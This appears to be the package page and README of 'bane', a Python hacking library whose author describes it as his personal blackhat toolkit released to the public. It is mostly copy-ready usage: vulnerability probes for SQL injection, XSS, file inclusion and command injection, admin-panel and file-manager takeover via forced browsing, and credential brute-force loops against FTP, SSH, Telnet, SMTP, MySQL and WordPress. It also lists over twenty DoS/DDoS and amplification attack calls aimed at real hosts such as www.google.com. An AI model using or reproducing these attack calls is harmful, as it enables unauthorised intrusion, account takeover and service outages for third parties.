cyber security library
Project description
"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!" -Bane (Dark Knight)
.///` `.--::::::---.`` `///.
h-.-s+++/--<br>.---/+o++s:.-h
++..-. `:../s
-+ydm-..: :..-dmho:`
:odmNNNNs..-. `:..+MNNNmmy/. `
.odmNNNNMMMN`..: -..`mMMMMNNNNmy:
+mNNNNMMMMMMMo`.:` :``/MMMMMMMMNNNmy.
.yNNNNMMMMMMMMMd` `-<br>```````..-` `yMMMMMMMMMMNNNd:
-dNNNMMMMMMMMMMMN` ..-` `-`- mMMMMMMMMMMMMNNmo
:mNNNMMMMMMMMMMMMM: . `.` -MMMMMMMMMMMMMMNNNs`
/mNNNMMMMMMMMMMMMMMy --- .-- oMMMMMMMMMMMMMMMNNNy`
:mNNNMMMMMMMMMMMMMMMN```:.````````.:```dMMMMMMMMMMMMMMMMNNNy`
-mNNNNMMMMMMMMMMMMMMMMo`.-` `-.`+MMMMMMMMMMMMMMMMMNNNNo
hNNNNNMMMMMMMMMMMMMMMMm.``- .``.dMMMMMMMMMMMMMMMMMMNNNm-
-NNNNNMMMMMMMMMMMMMMMMMM-..: -<br>NMMMMMMMMMMMMMMMMMMNNNNs
oNNNNNMMMMMMMMMMMMMMMMMMo``.` -` +MMMMMMMMMMMMMMMMMMMNNNNm
:dNNNNNNMMMMMMMMMMMMMMMMMd<br>-``````<br>.hMMMMMMMMMMMMMMMMMMMNNNNNs.
.ssmNNNNNNMMMMMMMMMMMMMMMMMM.``/:. .-/```NMMMMMMMMMMMMMMMMMMNNNNNNyy+` `
`oy: mNNNNNNMMMMMMMMMMMMMMMMMM/``-` `-``:MMMMMMMMMMMMMMMMMMMNNNNNN/`+y: `
+y` dNNNNNNMMMMMMMMMMMMMMMMMMy..-:- --:..oMMMMMMMMMMMMMMMMMMMNNNNNN: -N`
m- hNNNNNNMMMNdhhyyhddmMMMMMd```:.``.:```hMMMMNdhso++++shmNMMMNNNNN: yo `
/d yNNNNNMMh/-````````.-/ydNM.``- -```NNds:.`..-----..-sNMMNNNNN- -m`
h+ sNNNNNMMmsyhddmmmdhs:` `-o/../` `/-.:+-` `:yhddmNNNNmmNMMMNNNNN. d/
m/ oNNNNNMMMMMMMNdyssoooo:` `:..``.+```.-. :o++//+yydMMMMMMMMNNNNN` .so
d-- /NNNNNNMMMMMmyhm// ymy.`- o `- odm:- .ddssNMMMMMNNNNNm /:s
.h / :NNNNNNNMMMmhshhy+++ohy/. .: `o` `/``-shysssyddddNMMMMNNNNNNd --.h
-y `: .NNNNNNNMMMMMMMMNNmmmhys/:.`..``.``..`-:syhhdmNNMMMMMMMMMMNNNNNy / `d
:s :` dNNNNNMMMMMMMMMNNNmmNNh- `.` `.` `+mMNNNNNMMMMMMMMMMNNNNN+ :` m `
/o /` oNNNNMMMMMMMMMMMMMMmd+.. `.:- -` - -:.. -sddmNMMMMMMMMMMMMNNNm. .: m `
++ `:``dNNNMMMMMMMMMMMNo+/.`./-. o` --` o `-/.``/+omMMMMMMMMMMNNNo .: d` `
-h `:`:mNNMMMMMMMMMMd-.+.+--:.`.+.-.::.-./-`.:--/:+..hMMMMMMMMMNNh`.: -h `
s: `:`+mNMMMMMMMMMm- `/:` o/://++:++++:+/+/:/o``:+` .mMMMMMMMMNd..: y-
.h `:`/hNMMMMMMd+: -::<br>s-:+`.+:+-.+:+:`/:-+:-.-:- :NMMMMMMNy.-- :y
o/ ` `:``:ymMNh:`- /:-+`o::/` +:/. +:+` /::o./--+ /omMNdo- -- ` h.
`d` `+.` :.` -s: -` ./:::`/::/ +-/. +-+` :::/`-:::- `-`++.``-. `-+ :s
o+ /`-:``.-. `- /--/ /:-: +-/. +-+ :-:+ /--/ .. `--. .:..: h.
`d` :` +h+. - `+-:: .+-:+..-+://-+:+-../:-+-`-:-/. -` -yd. / /s
o+ `:. -ydo. -` //::..o/-:o:.//:/++/:/+.:+/-/+: /::o : :yd+``-- d.
`d .:. -sy .. .o--+ -.+-.`.-/<br>:/<br>/--`.-+.: +--o- `/d+``--`:s
s/ .:` :.:```-o--o.-.:-` `:/ .: /:` `-/ / s:-o-```+``.-` h.
.h -:`/.///`/..`:-.:`<br> <br><br><br>. <br>`: /--../ //:o.:.-y
s: -o/::/:--.-.-.: : /`:.---/::+. y-
`h. ``/. `/ ` -.:``` <br><br>..` ```: / ` :` ./. +o
.y. -.-- -.:.``- -```::```: ..`./ : .-.-` /s
.y- -.:```: :/::o+/::/ : ``: : `+o
`s+` -..- -.o/:/: `+::+//:+. -/::o`: ..`-` .s/
:s- ./- `- -.o//o. /:::-::+ `o//o : -` ./.`+o.
`/o:+..+`.` -.://+<br>+--//:-+<br>////`: `../-.ss-
/h /` ..-` .-o/+:..+--//:-+..-o/+:.` `-.- `+ y-
o+``.-+-.::<br>o//o- /--::--+ .o//s<br>:/.-//:``:s
-o:```.//: :+::+.o--oo:-o.+::+/ :/o.```:o:
-o++oy.: .- /`o::oo:-+-/ -- /o++++o:
`os .. /..//../ ..` `s:
`o+. `:`:-.-. `.++-
`/+/.` `. .` `-++:`
`:+++/:-<br>-:+++/-
`.-::--`
`
INTRODUCTION:
This python library is made for educationnal purposes only. Me, as the creator and developper, not responsible for any misuse for this module in any malicious activity. it is made as a tool to understand how hackers can create their tools and performe their attacks. it contains most of known attacks and exploits. it can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scrapping proxies, crawling, google dorking, checking for vulnerabilities (sql injection (all types), xss, command execution, php code injection, FI, forced browsing
) and even more ;)
SPECIAL SPEECH:
this is dedicated to my mentor: Zachary Barker ( https://www.facebook.com/zachary.barker.5439 ), he was my leader and teacher through my journey in hacking world and groups, we have been through a lot together and were there in many operations when i was an active member in blackhat community but now he is dead in a hit-and-run :( . he was one of my true cyber bros:
-S0u1 ( https://www.facebook.com/S0u1.HLoTW ) : programmer and blackhat.
-Vince ( https://www.facebook.com/vincelinux ) : Linux and hardware expert, social engeneering and programmer.
-Zachary Barker (lulz zombie) : teams leader, anarkist, ops organizer, progammer, cyber security expert and blackhat.
-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.
-Jen Hill.
in the honor of all my bros and the memory of my bro zach im sharing all my personal hacking tools with public for the first time. plz use it wisely :)
now let's start some tutorials, shall we?
TUTORIALS:
I-INSTALLING THE LIBRARY AND IMPORTING:
you can use pip to do that:
pip install bane
or you can clone the project's link then run setup.py
git clone https://github.com/AlaBouali/bane
cd bane
python setup.py install
to import it you just do:
import bane
NOTES:
-for windows' users you can't use: bane.ssh1() and bane.telnet1() because they depend on pexpect and it need expect package to work, which can't be installed on windows
-termux's users can't use this library cuz some module can't be installed, so it's pointless :(
II-USAGE:
this module have many incredible, useful and easy use functions that can be implemented in any project that is related to Web Application's Security.
Vulnerabilities:
default parameters:
logs=True (print the test's result on the screen, set to False to not display).
returning=False (return a value indicating the success (1/True) or fail (0/False) of the test).
timeout: timeout value.
proxy: same way as you use "proxies" parameters in requests.
1-SQL-Injection:
(useful link: https://www.acunetix.com/websitesecurity/sql-injection2/ )
let's start with a simple SQL Injection testing. there are some techniques that can tell us if the web application is vulnerable to SQL-Injection or not, there is:
-Error Based.
-boolean based.
-time based.
here we have functions that can determinate whether the web application is vulnerable to SQL-Injection or not using the mentioned techniques.
bane.sqlieb('http://example.com/index.php?id=5')#testing for Error Based SQLI
bane.sqlitb('http://example.com/index.php?id=5')#testing for Time Based SQLI
bane.sqlibb('http://example.com/index.php?id=5')#testing for Boolean Based SQLI
t hey return only 2 possible results:
False: the target is not vulnerable.
True: the target is vulnerable.
2-XSS:
(useful link: https://www.acunetix.com/vulnerabilities/web/cross-site-scripting/ )
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.
here we have a function to get all html inputs in any webpage and test each input one by one against this attack with both: GET and POST methods.
bane.xss('https://xss-game.appspot.com/level1/frame')
output:
Getting parameters
Test has started
Payload:
parameter: query method: GET=> [+]Payload was found
parameter: query method: POST=> [-]Payload was not found
there is a default payload which is used in case you didn't modify the "payload" parameter (set by default to: None) to any XSS payload.you can set differnet xss payloads to test everytime with possibility to use a proxy.
there is another functions to test with:
bane.xssget('http://example.com/index.php',{parameter: xss-payload-here})
bane.xsspost('http://example.com/index.php',{parameter: xss-payload-here})
3-FI:
(File Inclusion): (useful link: https://www.acunetix.com/vulnerabilities/web/file-inclusion/ )
we can test a web application if it is vulnerable to FI using this function:
bane.fi('http://example.com/index.php?file=page1.php')
it returns (in case the parameter "returning" set to: True) a dict that contains
{ "Status" : status # ==>True if success or False is fail
,
"Nullbyte" : nullbyte # ==>True if "nullbyte" parameter is set to True
,"Link" : r.url # ==> the result URL}
4-PHP code injection:
(useful link: https://www.acunetix.com/vulnerabilities/web/php-code-injection/ )
to test a web application against PHP code injection we can use those functions:
bane.injectlink('http://example.com/index.php?id=2')
if it returns:
False: not vulnerable
True: vulnerable
you can use another functions to do that as well:
bane.getinject('http://example.com/index.php',param=parameter-here)
bane.postinject('http://example.com/index.php',param=parameter-here)
5-command injection:
(useful link: https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013) )
OS command injection is a technique used via a web interface in order to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.
here we can test the web application against this type of vulnerabilities using those functions:
bane.execlink('http://example.com/index.php?doc=1')
bane.getexec('http://example.com/index.php',param=your_parameter_here)
bane.postexec('http://example.com/index.php',param=your_parameter_here)
5-forced browsing:
(useful link: https://www.owasp.org/index.php/Forced_browsing )
Forced browsing is an attack where the aim is to enumerate and access resources that are not referenced by the application, but are still accessible.
An attacker can use Brute Force techniques to search for unlinked contents in the domain directory, such as temporary directories and files, and old backup and configuration files. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, and so on, thus being considered a valuable resource for intruders.
This attack is performed manually when the application index directories and pages are based on number generation or predictable values, or using automated tools for common files and directory names.
This attack is also known as Predictable Resource Location, File Enumeration, Directory Enumeration, and Resource Enumeration.
admin panel:
we can access and enumerate some or all internal admin panel pages using this method and takeover the panel!!!
bane.forcebrowsing('http://example.com/admin/' , ext="php",timeout=10)
or
bane.forcebrowsing('http://example.com/admin/' , ext="asp")
also you can use a function here to find the site's admin login panel:
bane.adminpanel('http://example.com/admin/' , ext="php",timeout=7)
the default extension is "php", you can change it as you like to: asp, aspx
using the parameter "ext".
filemanager:
we can bruteforce the path to a possible filemanager and takeover it using this technique:
bane.filemanager('http://example.com')
6-Slow DoS vulnerabilities:
(useful link: https://www.cloudflare.com/learning/ddos/ddos-low-and-slow-attack/ )high timeout value:
bane.timeouttest('www.google.com',port=443)
slow GET attack test:
bane.slowgettest('www.google.com',port=80)
slow POST attack test:
bane.slowposttest('www.google.com',port=80)
slow read attack test:
bane.slowreadtest('www.google.com',port=80)
connections per IP test:
bane.connectionslimit('www.google.com',port=80)
7-Bruteforce attacks:
(useful link: https://www.acunetix.com/vulnerabilities/web/login-page-password-guessing-attack/ )
here we are doing a bruteforce attach against a target using a list of usernames and passwords, if the loin function returned True, then logins founds else it failed.
FTP:
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
user=x.split(":")[0]
pwd=x.split(":")[1]
print'"[*]Trying:",user,pwd
if bane.ftp("example.com",username=user,password=pwd)==True:
print'[+]Found'
break
else:
print'[-]Failed'
SSH:
here we have 2 different ways to logins to a ssh server:
ssh1:
(using pexpect module with "spawn" instead of "pexssh", which is more cleaver)
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
user=x.split(":")[0]
pwd=x.split(":")[1]
print'"[*]Trying:",user,pwd
if bane.ssh1("example.com",username=user,password=pwd)==True:
print'[+]Found'
break
else:
print'[-]Failed'
ssh2:
(using paramiko module)
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
user=x.split(":")[0]
pwd=x.split(":")[1]
print'"[*]Trying:",user,pwd
if bane.ssh2("example.com",username=user,password=pwd)==True:
print'[+]Found'
break
else:
print'[-]Failed'
TELNET:
here we have 2 different ways to logins to a telnet server:
telnet1:
(using pexpect module with "spawn" instead of "pexssh", which is more cleaver)
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
user=x.split(":")[0]
pwd=x.split(":")[1]
print'"[*]Trying:",user,pwd
if bane.telnet1("example.com",username=user,password=pwd)==True:
print'[+]Found'
break
else:
print'[-]Failed'
telnet2:
(using telnetlib module)
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
user=x.split(":")[0]
pwd=x.split(":")[1]
print'"[*]Trying:",user,pwd
if bane.telnet2("example.com",username=user,password=pwd)==True:
print'[+]Found'
break
else:
print'[-]Failed'
SMTP:
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
user=x.split(":")[0]
pwd=x.split(":")[1]
print'"[*]Trying:",user,pwd
if bane.smtp("example.com",username=user,password=pwd)==True:
print'[+]Found'
break
else:
print'[-]Failed'
MYSQL:
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
user=x.split(":")[0]
pwd=x.split(":")[1]
print'"[*]Trying:",user,pwd
if bane.mysql("example.com",username=user,password=pwd)==True:
print'[+]Found'
break
else:
print'[-]Failed'
ADMIN LOGIN:
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
user=x.split(":")[0]
pwd=x.split(":")[1]
print'"[*]Trying:",user,pwd
if bane.adminlogin("http://example.com/admin/login.php",{'username':user,'password':pwd)==True:
print'[+]Found'
break
else:
print'[-]Failed'
WORDPRESS ADMIN LOGIN:
wordlist=["admin:admin","admin:12345","root:root"]
for x in wordlist:
user=x.split(":")[0]
pwd=x.split(":")[1]
print'"[*]Trying:",user,pwd
if bane.wpadmin("http://example.com/",username=user,password=pwd)==True:
print'[+]Found'
break
else:
print'[-]Failed'
HYDRA TOOL:
hydra is a famous tool that is widely used for bruteforce attacks. here is a python version of it in python based on the above functions.
it takes the following parameters:
proto:set by default to: "ssh", it can be set to: "ftp","ssh","telnet","smtp","mysql","wp" (to bruteforce WP sites on HTTP protocol)
p: target port, set by default to: 22
wl: the list contains usernames and passwords seperated by ":", ex: ["admin:admin","admin:12345","root:root"]
wordlist=["admin:admin","admin:12345","root:root"]
bane.hydra("127.0.0.1",proto="telnet",p=23,wl=wordlist)
DoS / DDoS:
(useful link: https://en.wikipedia.org/wiki/Denial-of-service_attack )
bane.hulk('www.google.com',threads=1000) #hulk attack
bane.proxhulk('www.google.com',threads=1000) #hulk attack with http proxies
bane.slowloris('www.google.com',p=80,threads=50) #slowloris attack
bane.xerxes('www.google.com',p=443,threads=500) #xerxes attack
bane.httpflood('www.google.com',p=80,threads=1000) #http flood
bane.lulzer('www.google.com',p=80,threads=1000) #http flood with proxies
bane.tcpflood('www.google.com',threads=1000) #tcp flood
bane.udp('50.63.33.34',p=80) #udp flood
bane.doser('https://www.google.com',threads=500)
bane.proxdoser('https://www.google.com',threads=500)
bane.torshammer('www.google.com',p=80,threads=1000)
bane.slowread('www.google.com',p=80,threads=1000)
bane.apachekiller('www.google.com',p=80,threads=500)
bane.goldeneye('www.google.com',p=80,threads=1000)
bane.medusa('www.google.com',p=80,threads=1000)
bane.icmp('50.63.33.34',p=80,threads=100)
bane.synflood('50.63.33.34',p=80,threads=100)
bane.icmpstorm('50.63.33.34',p=80,threads=100)
bane.land('50.63.33.34',p=80,threads=100)
bane.udpstorm('50.63.33.34',p=80,threads=100)
bane.blacknurse('50.63.33.34',p=80,threads=100)
bane.dnsamplif('50.63.33.34',p=80,dnslist=[your_dns_servers_list_here],threads=100)
bane.ntpamplif('50.63.33.34',p=80,dnslist=[your_ntp_servers_list_here],threads=100)
bane.snmpamplif('50.63.33.34',p=80,dnslist=[your_snmp_servers_list_here],threads=100)
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.